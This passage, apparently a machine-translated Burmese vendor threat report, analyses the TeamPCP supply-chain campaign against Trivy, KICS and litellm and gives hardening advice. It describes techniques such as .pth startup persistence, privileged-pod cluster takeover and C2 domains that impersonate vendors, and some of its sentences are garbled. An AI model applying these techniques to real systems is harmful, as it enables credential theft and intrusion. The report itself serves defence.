အထောက်အထားခိုင်လုံမှု: မြင့်မားသည်။ မျှဝေထားသော RSA အများသုံးသော့၊ tpcp ငါးရက်ကြာ ကမ်ပိန်းတစ်လျှောက် ရှေးဟောင်းပစ္စည်းအမည်ပေးခြင်း၊ C2 အခြေခံအဆောက်အအုံ ထပ်တူကျခြင်းနှင့် လည်ပတ်မှုအရှိန်အဟုန်တို့သည် Trivy၊ KICS၊ npm၊ OpenVSX နှင့် litellm ညှိနှိုင်းမှုများကို တူညီသောသရုပ်ဆောင်နှင့် ခိုင်မာစွာ ချိတ်ဆက်ပေးသည်။

အကွောငျးရငျးငွေကြေးဆိုင်ရာ (crypto wallet ခိုးယူမှု၊ cloud credential monetization) နှင့် ကျော်ကြားမှု (Telegram taunting) ပေါင်းစပ်ထားဖွယ်ရှိသည်။ credential harvesting ၏ ကျယ်ပြန့်မှု — AWS IAM မှ Solana validator keypairs အထိ WireGuard configs အထိ — သည် ညှိနှိုင်းမှုတစ်ခုစီမှ ROI ကို အမြင့်ဆုံးရရှိရန် ကြိုးပမ်းနေသော ငွေကြေးဆိုင်ရာ လှုံ့ဆော်မှုရှိသော သရုပ်ဆောင်တစ်ဦးကို ညွှန်ပြနေသည်။

ဖြစ်နိုင်ချေရှိသော AI အကူအညီ: credential harvester သည် စနစ်တကျ ပြည့်စုံသည် — Cardano signing keys၊ WireGuard configs နှင့် Kaniko Docker credentials ကဲ့သို့သော niche targets များ အပါအဝင် အမျိုးအစား ၁၅+ — AI-assisted enumeration နှင့် ကိုက်ညီသော နည်းလမ်းဖြင့်။ payload iteration ၏ အမြန်နှုန်း (encryption schemes အမျိုးမျိုးဖြင့် variants သုံးခု)၊ cross-ecosystem coordination (၅ ရက်အတွင်း ecosystem ၅ ခု) နှင့် operational OPSEC (vendor-impersonating domains၊ hybrid encryption၊ telemetry အဖြစ် ဖုံးကွယ်ထားသော systemd persistence) တို့သည် AI-assisted development ကို force multiplier အဖြစ် ထင်ဟပ်စေနိုင်သည့် throughput အဆင့်ကို အကြံပြုထားသည်။ ဤအကဲဖြတ်မှုသည် ထင်ကြေးသက်သက်သာဖြစ်သည်။ ကျွမ်းကျင်သော operator များသည် AI tooling မပါဘဲ အလားတူ scope ကို ရရှိနိုင်သည်။

TTP အသစ်များနှင့် နည်းပညာများ

၁။ လုံခြုံရေးကိရိယာ ထောက်ပံ့ရေးကွင်းဆက် အဆိပ်သင့်ခြင်း (T1195.002 မျိုးကွဲ)

လုံခြုံရေးစကင်နာများ (Trivy၊ KICS) ကို downstream target များထံရောက်ရှိရန် first-hop အဖြစ် ထိခိုက်စေခြင်းသည် escalation အသစ်တစ်ခုဖြစ်သည်။ တိုက်ခိုက်သူသည် library တစ်ခုကို ထိခိုက်စေရုံသာမက အဖွဲ့အစည်းများအသုံးပြုသည့် tools များကိုပါ ထိခိုက်စေခဲ့သည်။ detect အန္တရာယ်ရှိသော စာကြည့်တိုက်များ။ ၎င်းက မျက်ကွယ်ပြုထားသော နေရာတစ်ခုကို ဖန်တီးပေးသည်- အန္တရာယ်ရှိသော ကုဒ်ကို ဖမ်းယူသင့်သော စကင်နာကိုယ်တိုင်က ပေးပို့သည့် ယန္တရားဖြစ်သည်။

2 ။ Python ကို .pth ဖိုင်ကြာရှည်ခံမှု (T1546)

အဆိုပါ litellm_init.pth v1.82.8 ရှိ နည်းပညာသည် အထူးသဖြင့် လျှို့ဝှက်ဆန်းကြယ်သည်။ Python .pth ဖိုင်များ site-packages/ interpreter startup တိုင်းမှာ process လုပ်ပါတယ်။ နဲ့စတဲ့ စာကြောင်းတိုင်း import ကုဒ်အဖြစ် လုပ်ဆောင်သည်။ payload ကို တစ်ခုတည်းပေါ်တွင် ချိတ်ဆက်ခြင်းဖြင့် import ဖော်ပြချက်အရ၊ တိုက်ခိုက်သူသည် litellm ကို import လုပ်သည့်အခါတွင်သာမက Python process တိုင်းတွင် execution ကို ရရှိသည်။ ဆိုလိုသည်မှာ litellm ကို install လုပ်ထားပြီး အသုံးမပြုသည့်တိုင် payload သည် fire ဖြစ်ပြီး compromised လုပ်ခံရသော remediation ကို အစားထိုးသည်။ .py စစ်ဆေးခြင်းမရှိဘဲ ဖိုင်များ .pth ဖိုင်များကို။

၃။ Privileged Pod Deployment (T1610၊ T1611) မှတစ်ဆင့် Kubernetes Cluster-Wide Lateral Movement

cluster node တိုင်းတွင် privileged pods များကို အလိုအလျောက်ဖန်တီးခြင်း — နှင့်အတူ hostPIDhostNetwork, host filesystem mount နှင့် chroot persistence ကို install လုပ်ဖို့ — container deployment (T1610) ကို escape to host (T1611) နဲ့ chains လုပ်ခြင်းအားဖြင့် single compromised workload တစ်ခုကို full cluster compromision အဖြစ်ပြောင်းလဲနိုင်ပါတယ်။

၄။ ရောင်းချသူ-C2 အခြေခံအဆောက်အအုံအယောင်ဆောင်ခြင်း

အသုံးပြုခြင်း models.litellm.cloud (litellm ကိုတုပသည်) နှင့် checkmarx.zone (Checkmarx ကိုတုပသည်) C2/exfil endpoints များကို ကွန်ရက်စောင့်ကြည့်ခြင်းကို ရှောင်ရှားရန် ဒီဇိုင်းထုတ်ထားသောကြောင့်ဖြစ်သည်။ egress traffic ကို ပြန်လည်သုံးသပ်သော SOC ခွဲခြမ်းစိတ်ဖြာသူများသည် တရားဝင်ရောင်းချသူဒိုမိန်းများဟုထင်ရသည့်အရာများသို့ HTTPS ချိတ်ဆက်မှုများကို မြင်တွေ့ရမည်ဖြစ်သည်။

၅။ လျင်မြန်စွာ လေယာဉ်အတွင်း ဝန်တင်ခြင်း ထပ်ခါတလဲလဲလုပ်ဆောင်ခြင်း

v1.82.7 ကို import-time execution ဖြင့်ထုတ်ဝေပြီးနောက် ၁၃ မိနစ်အကြာတွင် startup-time execution ဖြင့် v1.82.8 ကိုထုတ်ဝေခြင်းဖြင့် တိုက်ခိုက်သူသည် အချိန်နှင့်တပြေးညီ စောင့်ကြည့်ခြင်းနှင့် လိုက်လျောညီထွေဖြစ်အောင်ပြုလုပ်ခြင်းကို ပြသသည်။ source code တွင် သိမ်းဆည်းထားသော မှတ်ချက်ပေးထားသော payload variants (ကွဲပြားသော encryption schemes များဖြင့်) သည် လည်ပတ်မှုအတွင်း တက်ကြွသော ဖွံ့ဖြိုးတိုးတက်မှုကို အတည်ပြုသည်။

ဘာတွေလုပ်ဆောင်နိုင်မလဲ။

ဒီတိုက်ခိုက်မှုဟာ အလွှာတိုင်းမှာ ယုံကြည်မှုကို အသုံးချပါတယ်- လုံခြုံရေးကိရိယာတွေကို ယုံကြည်တာ၊ ပက်ကေ့ဂျ်မှတ်ပုံတင်တွေကို ယုံကြည်တာ၊ ရင်းနှီးတဲ့ ဒိုမိန်းတွေကို ယုံကြည်တာ၊ CI/CD အလိုအလျောက်လုပ်ဆောင်ခြင်း။ ၎င်းကိုကာကွယ်ရန်အတွက် ဤယုံကြည်မှုနယ်နိမိတ်တစ်ခုစီကို ခိုင်မာအောင်ပြုလုပ်ရန် လိုအပ်သည်-

Package သုံးစွဲသူများအတွက်

  • ဗားရှင်းတစ်ခုတည်းဖြင့်မဟုတ်ဘဲ hash ဖြင့် dependencies များကို pin လုပ်ပါ။ pip install litellm==1.82.6 --hash=sha256:... ခိုးယူခံထားရသော ဗားရှင်းများသည် နောက်ဆုံးထွက်ဗားရှင်းအဖြစ် ခဏတာပေါ်လာလျှင်ပင် ထည့်သွင်းခြင်းမှ တားဆီးနိုင်မည်ဖြစ်သည်။
  • lockfile တွေကိုသုံးပါ။ pip-compilepoetry.lockနှင့် uv.lock တိကျသော ဗားရှင်းများနှင့် hash များကို ဖမ်းယူပါ။ CI/CD floating version specifiers များမှ မဟုတ်ဘဲ lockfiles များမှ ထည့်သွင်းသင့်သည်။
  • များအတွက်စောင့်ကြည့် .pth ဖိုင်များကို။ ပုံမှန်စစ်ချက် site-packages/ မျှော်လင့်မထားတဲ့အတွက် .pth files — ၎င်းတို့သည် Python startup တိုင်းတွင် execute လုပ်ကြပြီး persistence ယန္တရားတစ်ခုမျှသာဖြစ်သည်။
  • ထွက်ပေါက်ကွန်ရက်ထိန်းချုပ်မှုများကို အကောင်အထည်ဖော်ပါ။ စစ်ထုတ်ခြင်း models.litellm.cloud နှင့် C2 စစ်တမ်းကောက်ယူခြင်း checkmarx.zone ထုတ်လုပ်မှုပတ်ဝန်းကျင်များတွင် ခွင့်ပြုစာရင်းအခြေပြု egress filtering ဖြင့် ဖမ်းယူထားနိုင်သည်။

Package ထိန်းသိမ်းသူများအတွက်

  • တွယ်အပ် CI/CD လုပ်ဆောင်ချက်များ commit SHA၊ တဂ် မဟုတ်ပါ။ LiteLLM များ pipeline Pin လုပ်မထားတဲ့ Trivy ကိုသုံးခဲ့တယ်။ ရည်ညွှန်းထားရင် aquasecurity/trivy-action@<commit-sha> အစား @latest၊ ညှိနှိုင်းထားသော လုပ်ဆောင်ချက်ကို လုပ်ဆောင်မည်မဟုတ်ပါ။
  • သက်တမ်းတိုတောင်းပြီး အတိုင်းအတာသတ်မှတ်ထားသော ထုတ်ဝေမှုတိုကင်များကို အသုံးပြုပါ။ PyPI သည် Trusted Publishers (OIDC-based) နှင့် scoped API tokens များကို ပံ့ပိုးပေးသည်။ ထုတ်ယူထားသော PYPI_PUBLISH တိုကင်တွင် ကြာရှည်ခံပြီး ကန့်သတ်ချက်မရှိသော ထုတ်ဝေခွင့် မရှိသင့်ပါ။
  • PyPI မှာ two-factor authentication ကိုဖွင့်ပါ။ ပြုပြင်ထိန်းသိမ်းသူအားလုံးအတွက် 2FA လိုအပ်ပြီး ဖြစ်နိုင်သည့်နေရာတွင် hardware security key များကို အသုံးပြုပါ။
  • လက်မှတ်ထိုး အထုပ်တွေ။ Sigstore/PEP 740 အသိအမှတ်ပြုလက်မှတ်များသည် package တစ်ခုကို မျှော်မှန်းထားသည့်အတိုင်း တည်ဆောက်ထားကြောင်း စားသုံးသူများအား အတည်ပြုနိုင်စေပါသည်။ CI/CD pipelineခိုးယူထားသော တိုကင်ဖြင့် တိုက်ခိုက်သူထံမှ မဟုတ်ပါ။

ပလက်ဖောင်းအော်ပရေတာများအတွက် (PyPI၊ npm၊ GitHub)

  • ပုံမှန်မဟုတ်သော ထုတ်ဝေမှုပုံစံများကို ရှာဖွေတွေ့ရှိပါ။ ပုံမှန်နှင့်မတူသော IP သို့မဟုတ် တိုကင်မှ မိနစ် ၁၃ ခြား၍ ထုတ်ဝေသော ဗားရှင်းအသစ်နှစ်ခုသည် ပက်ကေ့ဂျ်ကို ထည့်သွင်းနိုင်မီ ပြန်လည်သုံးသပ်ရန် ဆိုင်းငံ့ထားခြင်း သို့မဟုတ် အလိုအလျောက် စကင်ဖတ်ခြင်းကို စတင်သင့်သည်။
  • ယုံကြည်စိတ်ချရသော ထုတ်ဝေသူများ လက်ခံအသုံးပြုမှုကို အရှိန်မြှင့်ပါ။ OIDC-based publishing သည် package များကို သတ်မှတ်ထားသော repositories နှင့် workflow များနှင့် ချိတ်ဆက်ပေးခြင်းဖြင့် ခိုးယူထားသော token များကို မူရင်းပြင်ပတွင် အသုံးမဝင်စေပါ။ CI/CD အခြေအနေ။
  • ထုတ်ဝေချိန် malware စကင်ဖတ်ခြင်းကို အကောင်အထည်ဖော်ပါ။ proxy_server.py ရှိ base64-decoded payload ကို publish အချိန်တွင် static analysis မှ ရှာဖွေတွေ့ရှိနိုင်ပါသည်။

ဂေဟစနစ်အတွက်

  • လုံခြုံရေးကိရိယာများကို အရေးကြီးသော အခြေခံအဆောက်အအုံများအဖြစ် သဘောထားပါ။ Trivy နှင့် Checkmarx KICS များကို သန်းပေါင်းများစွာသော လူများက အသုံးပြုကြသည်။ pipelines. ၎င်းတို့၏ GitHub Actions များကို ၎င်းတို့စကင်ဖတ်သည့် package များကဲ့သို့ပင် တိကျစွာ လက်မှတ်ရေးထိုး၊ pin လုပ်ကာ စောင့်ကြည့်သင့်သည်။
  • runtime detection မှာ ရင်းနှီးမြှုပ်နှံပါ။ Static analysis တစ်ခုတည်းဖြင့် obfuscation technique အားလုံးကို မဖမ်းမိနိုင်ပါ။ package install လုပ်ခြင်း၏ Runtime monitoring hooks၊ မမျှော်လင့်ထားသော ကွန်ရက်ချိတ်ဆက်မှုများနှင့် သံသယဖြစ်ဖွယ်ဖိုင်ဝင်ရောက်မှုပုံစံများသည် နက်ရှိုင်းစွာကာကွယ်မှုကို ပေးစွမ်းသည်။
  • ခြိမ်းခြောက်မှုထောက်လှမ်းရေးကို ပိုမိုမြန်ဆန်စွာ မျှဝေပါ။ litellm အတွက် ၅.၅ နာရီကြာ ထိတွေ့မှုကာလသည် cross-vendor ညှိနှိုင်းဆောင်ရွက်မှုကို ပိုမိုမြန်ဆန်စွာ ပြုလုပ်ခြင်းဖြင့် ပိုမိုတိုတောင်းနိုင်ပါသည်။ Xygeni MEW၊ Socket နှင့် Snyk ကဲ့သို့သော အလိုအလျောက်စကင်န်ဖတ်ခြင်းဝန်ဆောင်မှုများသည် ပုံမှန်မဟုတ်သောအချက်ကို တွေ့ရှိခဲ့သည် - ပိတ်ဆို့မှုမှာ လူသားအတည်ပြုချက်နှင့် မှတ်ပုံတင်ခြင်းတုံ့ပြန်မှုအချိန်ဖြစ်သည်။

ကောက်ချက်

TeamPCP လှုပ်ရှားမှုသည် သူ့အတွက် အရေးပါသော အခိုက်အတန့်တစ်ခု ဖြစ်သည်။ software supply chain securityလုံခြုံရေးစကင်နာများကို ဦးစွာထိခိုက်စေပြီး တန်ဖိုးမြင့် AI အခြေခံအဆောက်အအုံသို့ ခြေလှမ်းများအဖြစ် အသုံးပြုခြင်းဖြင့် တိုက်ခိုက်သူများသည် ထောက်ပံ့ရေးကွင်းဆက်သည် ၎င်း၏ အားအနည်းဆုံး transitive dependency ကဲ့သို့သာ အားကောင်းကြောင်းနှင့် dependency သည် သင့်အား ဘေးကင်းစေရန် သင်ယုံကြည်ရသော လုံခြုံရေးကိရိယာတစ်ခု ဖြစ်နိုင်ကြောင်း ပြသခဲ့သည်။

litellm ညှိနှိုင်းမှုသည် AI အခြေခံအဆောက်အအုံအပေါ် ကြီးထွားလာနေသောအန္တရာယ်ကို အထူးမီးမောင်းထိုးပြသည်။ LLM proxy gateways များဖြစ်လာသည်နှင့်အမျှ standard ပုံစံ enterprise AI ဖြန့်ကျက်မှုတွင် ၎င်းတို့သည် API key များ၊ cloud credentials များနှင့် အရေးကြီးဒေတာများကို တစ်ခုတည်းသော component တွင် ဝင်ရောက်ခွင့်ကို အာရုံစိုက်ထားသည်။ ထို component ကို ထိခိုက်စေခြင်းသည် AI stack တစ်ခုလုံး၏ skeleton key တစ်ခုဖြစ်သည်။

၅.၅ နာရီကြာ ကာလအတွင်း litellm 1.82.7 သို့မဟုတ် 1.82.8 ကို ထည့်သွင်းခဲ့သော အဖွဲ့အစည်းများသည် ၎င်းကို အပြည့်အဝ အထောက်အထား ညှိနှိုင်းမှုတစ်ခုအဖြစ် သဘောထားသင့်သည်- ထိခိုက်ခံရသော စနစ်များရှိ လျှို့ဝှက်ချက်အားလုံးကို အလှည့်ကျ လဲလှယ်ပါ၊ Kubernetes cluster များကို audit လုပ်ပါ node-setup-* ဘူးခွံများ kube-system, မည်သည့်အရာကိုမဆို ဖယ်ရှားပါ sysmon.service systemd units များနှင့် စစ်ဆေးရန် litellm_init.pth Python မှာ site-packages/ လမ်းညွှန်များ။ တရားဝင် Docker image ၏ အသုံးပြုသူများ (ghcr.io/berriai/litellm) ကို ထိခိုက်မှု မရှိခဲ့ပါ၊ အဘယ်ကြောင့်ဆိုသော် ရုပ်ပုံသည် ၎င်း၏ dependencies များကို pin လုပ်ထားပြီး exposure window အတွင်း ပြန်လည်တည်ဆောက်ခြင်း မရှိသောကြောင့် ဖြစ်သည်။

အာဘော်အကြောင်း

Co-Founder & CTO

လူးဝစ်ရိုဒရီဂွက်ဇ် Xygeni Security မှာ ပူးတွဲတည်ထောင်သူနဲ့ CTO ပါ။ အပလီကေးရှင်းလုံခြုံရေးမှာ နှစ် ၂၀ ကျော် အတွေ့အကြုံရှိတဲ့ သူဟာ AppSec ကာကွယ်မှုနဲ့ အဆင့်မြင့်ကုဒ်ခွဲခြမ်းစိတ်ဖြာမှုစွမ်းရည်တွေကို အာရုံစိုက်ပြီး အဖွဲ့တွေကို တကယ့်ပို့ဆောင်မှုအန္တရာယ်ကို လျှော့ချပေးဖို့ ကူညီပေးပါတယ်။

 
sca-tools-software-composition-analysis-tools
သင့်ဆော့ဖ်ဝဲလ်အန္တရာယ်များကို ဦးစားပေးသတ်မှတ်ခြင်း၊ ပြုပြင်ခြင်းနှင့် လုံခြုံစေခြင်း
သင့်ရဲ့ အခမဲ့အကောင့်ကို ရယူလိုက်ပါ။
အကြွေးဝယ်ကဒ်မရှိပါ။

သင့်ရဲ့ Software Development နဲ့ Delivery ကို လုံခြုံအောင်ထားပါ

Xygeni ထုတ်ကုန်အစုံနှင့်အတူ